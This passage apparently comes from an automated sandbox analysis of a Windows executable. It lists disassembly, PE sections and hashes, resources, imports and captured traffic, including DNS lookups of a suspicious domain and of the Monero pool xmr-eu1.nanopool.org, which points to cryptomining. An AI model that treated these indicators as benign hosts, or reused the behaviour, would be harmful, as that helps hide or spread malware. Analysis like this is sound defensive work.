                                            mov eax, dword ptr [ebp-04h]
                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                            mov dword ptr [ebp-08h], eax
                                            lea eax, dword ptr [ebp-10h]
                                            mov dword ptr fs:[00000000h], eax
                                            ret
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            mov ecx, dword ptr [ebp-10h]
                                            mov dword ptr fs:[00000000h], ecx
                                            pop ecx
                                            pop edi
                                            pop edi
                                            pop esi
                                            pop ebx
                                            mov esp, ebp
                                            pop ebp
                                            push ecx
                                            ret
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 0Ch
                                            lea ecx, dword ptr [ebp-0Ch]
                                            call 00007F31885F48D1h
                                            push 0043F388h
                                            lea eax, dword ptr [ebp-0Ch]
                                            push eax
                                            call 00007F3188604D25h
                                            int3
                                            jmp 00007F3188606BF8h
                                            push ebp
                                            mov ebp, esp
                                            and dword ptr [00466078h], 00000000h
                                            sub esp, 24h
                                            or dword ptr [004427B0h], 01h
                                            push 0000000Ah
                                            call dword ptr [004361D0h]
                                            test eax, eax
                                            je 00007F31886024E2h
                                            and dword ptr [ebp-10h], 00000000h
                                            xor eax, eax
                                            push ebx
                                            push esi
                                            push edi
                                            xor ecx, ecx
                                            lea edi, dword ptr [ebp-24h]

                                            Rich Headers

                                            Programming Language:
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x405c00x34.rdata
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x405f40x50.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x8498.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x255c.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3e3b00x54.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x388b00x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x360000x278.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3fa9c0x120.rdata
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x345cc0x34600b7a8b04ab2248443b05e8133fb3a9064False0.5887343377088305data6.708390817791953IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x360000xb4100xb600a418919d63b67e937555eec95d3b6bcbFalse0.45409083104395603Applesoft BASIC program data, first line number 45.215945456388312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x420000x247580x1200d8d5c95192b51ddad1857caa38e7daa9False0.4049479166666667data4.078919796039023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .didat0x670000x1a40x200ee74a17c4eeb586c9811481b77498b43False0.4609375data3.5194570553957747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x680000x84980x86002217b820ffe0708c9de02a5171748b18False0.4214960354477612data5.218156641242916IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x710000x255c0x2600699c6b2b1b2acad2d0f219d9328713afFalse0.783203125data6.6660836278877325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            PNG0x685840xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                            PNG0x690cc0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                            RT_ICON0x6a6780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.38386524822695034
                                            RT_ICON0x6aae00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.2075515947467167
                                            RT_ICON0x6bb880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.1412863070539419
                                            RT_DIALOG0x6e1300x286dataEnglishUnited States0.5092879256965944
                                            RT_DIALOG0x6e3b80x13adataEnglishUnited States0.60828025477707
                                            RT_DIALOG0x6e4f40xecdataEnglishUnited States0.6991525423728814
                                            RT_DIALOG0x6e5e00x12edataEnglishUnited States0.5927152317880795
                                            RT_DIALOG0x6e7100x338dataEnglishUnited States0.45145631067961167
                                            RT_DIALOG0x6ea480x252dataEnglishUnited States0.5757575757575758
                                            RT_STRING0x6ec9c0x1e2dataEnglishUnited States0.3900414937759336
                                            RT_STRING0x6ee800x1ccdataEnglishUnited States0.4282608695652174
                                            RT_STRING0x6f04c0x1b8dataEnglishUnited States0.45681818181818185
                                            RT_STRING0x6f2040x146dataEnglishUnited States0.5153374233128835
                                            RT_STRING0x6f34c0x46cdataEnglishUnited States0.3454063604240283
                                            RT_STRING0x6f7b80x166dataEnglishUnited States0.49162011173184356
                                            RT_STRING0x6f9200x152dataEnglishUnited States0.5059171597633136
                                            RT_STRING0x6fa740x10adataEnglishUnited States0.49624060150375937
                                            RT_STRING0x6fb800xbcdataEnglishUnited States0.6329787234042553
                                            RT_STRING0x6fc3c0xd6dataEnglishUnited States0.5747663551401869
                                            RT_GROUP_ICON0x6fd140x30data0.8125
                                            RT_MANIFEST0x6fd440x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665

                                            Imports

                                            DLLImport
                                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, LocalFree, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 25, 2024 15:43:55.414566040 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:55.414640903 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:55.414753914 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:55.416088104 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:55.416104078 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:55.929397106 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:55.929521084 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:55.933954954 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:55.933974028 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:55.934246063 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:55.975164890 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:55.978598118 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:55.978626966 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:55.978701115 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.311929941 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.311973095 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.312007904 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.312040091 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.312068939 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.312112093 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.312167883 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.312167883 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.312192917 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.312230110 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.312740088 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.312798023 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.312804937 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.316632986 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.316654921 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.316696882 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.316705942 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.316757917 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.399064064 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.399139881 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.399173975 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.399199009 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.399214029 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.399229050 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.399259090 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.399672985 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.399702072 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.399714947 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.399720907 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.399760962 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.399768114 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.399838924 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.399885893 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.400624037 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.400640965 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.400654078 CEST49736443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.400659084 CEST44349736172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.444827080 CEST49737443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.444868088 CEST44349737172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.444971085 CEST49737443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.445246935 CEST49737443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.445259094 CEST44349737172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.912612915 CEST44349737172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.912750959 CEST49737443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.914083958 CEST49737443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.914091110 CEST44349737172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.914359093 CEST44349737172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:56.915175915 CEST49737443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.915206909 CEST49737443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:56.915213108 CEST44349737172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:57.231827021 CEST44349737172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:57.231893063 CEST44349737172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:57.231954098 CEST49737443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:57.232033014 CEST49737443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:57.232052088 CEST44349737172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:57.232065916 CEST49737443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:57.232070923 CEST44349737172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:58.859142065 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:58.859205961 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:58.859311104 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:58.859582901 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:58.859602928 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:59.319842100 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:59.319922924 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:59.321580887 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:59.321594954 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:59.321849108 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:59.322705984 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:59.322890043 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:59.322921038 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:59.323014021 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:59.323045969 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:59.323163986 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:59.323206902 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:43:59.323303938 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:43:59.323321104 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.015532017 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.015594006 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.015769005 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.015815973 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.015815973 CEST49738443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.015841961 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.015851021 CEST44349738172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.129868984 CEST49740443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.129897118 CEST44349740172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.129962921 CEST49740443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.130268097 CEST49740443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.130280018 CEST44349740172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.584295988 CEST44349740172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.584363937 CEST49740443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.585509062 CEST49740443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.585515022 CEST44349740172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.585756063 CEST44349740172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.587829113 CEST49740443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.587851048 CEST49740443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.587896109 CEST44349740172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.889276028 CEST44349740172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.889426947 CEST44349740172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.889477968 CEST49740443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.889524937 CEST49740443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.889524937 CEST49740443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.889544010 CEST44349740172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.889553070 CEST44349740172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.922712088 CEST49741443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.922754049 CEST44349741172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:00.922849894 CEST49741443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.923084021 CEST49741443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:00.923098087 CEST44349741172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:01.416448116 CEST44349741172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:01.416520119 CEST49741443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:01.417887926 CEST49741443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:01.417906046 CEST44349741172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:01.418140888 CEST44349741172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:01.418859005 CEST49741443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:01.418898106 CEST49741443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:01.418903112 CEST44349741172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:01.740530968 CEST44349741172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:01.740600109 CEST44349741172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:01.740833044 CEST49741443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:01.749562979 CEST49741443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:01.749582052 CEST44349741172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:01.831177950 CEST49742443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:01.831208944 CEST44349742172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:01.831299067 CEST49742443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:01.831590891 CEST49742443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:01.831604004 CEST44349742172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:02.289705992 CEST44349742172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:02.289809942 CEST49742443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:02.290978909 CEST49742443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:02.290996075 CEST44349742172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:02.291238070 CEST44349742172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:02.292010069 CEST49742443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:02.292045116 CEST49742443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:02.292049885 CEST44349742172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:02.618381977 CEST44349742172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:02.618526936 CEST44349742172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:02.618599892 CEST49742443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:02.618664980 CEST49742443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:02.618684053 CEST44349742172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:02.618695021 CEST49742443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:02.618700027 CEST44349742172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:03.409084082 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:03.409131050 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:03.409215927 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:03.409476042 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:03.409492970 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:03.870748043 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:03.870893955 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:03.872136116 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:03.872148991 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:03.872381926 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:03.873125076 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:03.873281002 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:03.873298883 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:03.873421907 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:03.873451948 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:03.873606920 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:03.873629093 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:03.873727083 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:03.873735905 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:04.547085047 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:04.547147036 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:04.547226906 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:04.547415972 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:04.547436953 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:04.547449112 CEST49743443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:04.547454119 CEST44349743172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:04.591032982 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:04.591084003 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:04.591171026 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:04.591444969 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:04.591460943 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.057439089 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.057573080 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.058770895 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.058779955 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.059005976 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.059779882 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.059803963 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.059807062 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.389122009 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.389183998 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.389254093 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.389362097 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.389390945 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:44:05.389404058 CEST49744443192.168.2.4172.67.195.146
                                            Aug 25, 2024 15:44:05.389410019 CEST44349744172.67.195.146192.168.2.4
                                            Aug 25, 2024 15:45:00.571037054 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:00.576132059 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:00.576797962 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:00.577167034 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:00.582075119 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.183458090 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.183559895 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.183682919 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:01.222944021 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:01.227972031 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.393560886 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.445127010 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:01.524087906 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.572681904 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:01.626470089 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:01.678469896 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:11.701189041 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:11.756552935 CEST4974510343192.168.2.4146.59.154.106
                                            Aug 25, 2024 15:45:21.797976017 CEST1034349745146.59.154.106192.168.2.4
                                            Aug 25, 2024 15:45:21.850305080 CEST4974510343192.168.2.4146.59.154.106

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Aug 25, 2024 15:43:55.383109093 CEST5972153192.168.2.41.1.1.1
                                            Aug 25, 2024 15:43:55.409955025 CEST53597211.1.1.1192.168.2.4
                                            Aug 25, 2024 15:45:00.556020021 CEST5216053192.168.2.41.1.1.1
                                            Aug 25, 2024 15:45:00.565752029 CEST53521601.1.1.1192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Aug 25, 2024 15:43:55.383109093 CEST192.168.2.41.1.1.10x3997Standard query (0)animoanimalestop.funA (IP address)IN (0x0001)false
                                            Aug 25, 2024 15:45:00.556020021 CEST192.168.2.41.1.1.10xa567Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false

                                            DNS Answers

